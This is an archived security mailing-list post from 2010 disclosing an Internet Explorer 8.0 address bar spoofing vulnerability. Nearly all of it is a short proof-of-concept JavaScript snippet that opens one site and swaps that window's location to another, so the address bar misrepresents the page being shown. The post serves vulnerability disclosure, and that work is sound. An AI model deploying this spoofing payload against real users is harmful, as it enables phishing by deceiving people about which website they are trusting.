Internet Explorer 8.0 Address Bar Spoofing Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: Internet Explorer 8.0 Address Bar Spoofing Vulnerability
From: info@xxxxxxxxxxxxxx
Date: 24 Jul 2010 11:08:33 -0000

Spoof Code:

<script>
function Spoof() {
  oc=window.open('http://www.securitylab.ir/', '','location=1');
  oc.location.replace('http://www.microsoft.com/');
}
</script>
<p align="center">
<a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>


Discovered by: Pouya Daneshmand 
http://Securitylab.ir/Advisories

Follow-Ups:
- Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability
  - From: Shreyas Zare

Prev by Date: Foofus.net Security Advisory: Symantec AMS Intel Alert Handler service Design Flaw
Next by Date: DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit
Previous by thread: Foofus.net Security Advisory: Symantec AMS Intel Alert Handler service Design Flaw
Next by thread: Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux